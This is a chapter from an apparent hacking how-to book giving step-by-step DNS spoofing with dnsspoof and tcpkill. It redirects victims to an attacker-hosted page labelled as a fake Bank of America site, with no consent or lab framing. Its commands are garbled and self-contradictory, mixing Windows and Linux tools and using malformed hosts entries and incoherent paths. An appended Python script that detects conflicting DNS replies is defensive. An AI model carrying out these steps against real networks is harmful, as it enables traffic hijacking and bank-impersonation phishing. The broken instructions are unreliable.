Spoofing DNS to divert traffic to non-existent website - Hacking: Tapping into the Matrix: Step by Step Guide on How to Hack, including Tips, Secrets, Steps, and Hidden Traps! (2014)


Chapter 6. Spoofing DNS to divert traffic to non-existent website

Here’s a fun thing you can do. You can redirect users to non-existent websites. This isn’t just about cracking codes anymore. This time, you will be exploiting DNS, the Domain Name System. This works best on Linux, but if you can learn to let Linux run while on Windows OS, all the better.

Here’s what you should do:

1. Go to Applications > Kali Linux > Sniffing > Network Sniffers

2. Then, open dnsspoof. You will then see dnsspoof -i <interface> -f <hostsfile> on your screen. As you can see, it’s quite a simple syntax, nothing like what you have learned before.

3. Find a website that you can use. For example, abc.com.

4. Then, flush the DNS of the system. To do so, close the browser and type ipconfig /flushdns followed by ifconfig eth0 promisc. This way, your own computer would not be infiltrated by malicious packets as you are trying to hack the DNS.

5. You will now work to reauthenticate Windows 7. To do so, type tcpkill -9 host [abc.com]

6. Stop tcpkill by holding CTRL + C.

7. Now, it’s time to create the host file. Type the following:

192.168.116.7.hacker

The code above will then redirect you to 192.168.117.7

8. Then, you’d notice something like /etc/resolv.conf. Copy this and open it with KWrite: type bt> kwrite /etc/resolv.conf and then hit Enter. You have to make sure you save each entry in this sequence: nameserver IP Address.

9. Type 75.75.75.75.

10. Now, go to /etc/nsswitch.conf. Here you’ll find the hosts line, which lists the sources the system uses to resolve host names. There are different kinds of them:

dns – look the name up through the DNS servers listed in /etc/resolv.conf

mdns4_minimal – multicast DNS over IPv4, limited to .local names

files – look the name up in the local hosts file, /etc/hosts

mdns4 – multicast DNS over IPv4

[NOTFOUND=return] – stop the lookup if the preceding source reports that the name was not found

11. Now go to the local directory by typing cd /usr/local.

12. Now type gvim hosts

13. Once you have opened the hosts file, enter 192.168.1.101 www.abc.com. Make sure to use the Tab key to create a space between the numerical values and “abc.com”.

14. Then, create a new webpage. This will be the page the user is redirected to. Just type ifconfig eth0 -promisc followed by gvim /var/www/index.html.

15. You would then see something like this onscreen:

<html>

<body> <h1>This is the Fake Bank of America Web Site! </h1>

</body>

</html>

16. Start an Apache Web Server. This is built into Kali so it wouldn’t be that hard. Just go to Kali Linux > System Services > HTTP > Apache.

17. Now, you can start dnsspoof. This will send those users to your fake website and will intercept any kind of queries. Just type dnsspoof -f hosts.

18. Finally, you’d be able to see the address www.abc.com onscreen—but it will just be a blank screen! Voila! You have now spoofed the DNS!
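Seen from the monitoring side, the forged reply from step 17 has a recognisable shape: the client gets an answer for www.abc.com that disagrees with the one its configured resolver sends for the same query. The following is an added example, not code from the book; it parses raw DNS responses and flags any query (same client, same transaction ID, same name) that received conflicting A records. It assumes the resolver's genuine reply still reaches the client, and all sample packets and the helper `build` are constructed for illustration.

```python
import struct
from collections import defaultdict

def skip_name(buf, off):
    """Return the offset just past a DNS name (labels or a compression pointer)."""
    while buf[off]:
        if buf[off] & 0xC0 == 0xC0:       # a 2-byte pointer always ends the name
            return off + 2
        off += 1 + buf[off]
    return off + 1

def parse_response(buf):
    """Return (txid, qname, sorted A-record IPs) for a one-question DNS response."""
    txid, _flags, _qd, ancount = struct.unpack("!4H", buf[:8])
    labels, off = [], 12
    while buf[off]:                       # the question name is never compressed
        labels.append(buf[off + 1:off + 1 + buf[off]].decode("ascii"))
        off += 1 + buf[off]
    off += 5                              # root label + QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        off = skip_name(buf, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        if rtype == 1 and rdlen == 4:     # A record
            ips.append(".".join(map(str, buf[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, ".".join(labels).lower(), tuple(sorted(ips))

def find_conflicts(responses):
    """Group replies by (client, txid, qname); keep groups whose answers differ."""
    seen = defaultdict(set)
    for client, raw in responses:
        txid, qname, ips = parse_response(raw)
        seen[(client, txid, qname)].add(ips)
    return {key: answers for key, answers in seen.items() if len(answers) > 1}

def build(txid, name, ip):
    """Construct a minimal DNS response (sample data for this example only)."""
    q = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\0"
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(map(int, ip.split(".")))
    return struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1) + rr

# Constructed capture; only 192.168.1.101 (the hosts entry in step 13) is from the page.
SAMPLE = [
    ("192.168.1.50", build(0x1A2B, "www.abc.com", "192.168.1.101")),   # arrives first
    ("192.168.1.50", build(0x1A2B, "www.abc.com", "203.0.113.10")),    # resolver's reply
    ("192.168.1.50", build(0x1A2C, "www.example.org", "198.51.100.4")),
]
print(find_conflicts(SAMPLE))
```

A single conflicting pair is a lead rather than proof, since some load-balanced zones legitimately rotate answers; an answer pointing at an address inside the local subnet for a public name is the stronger signal.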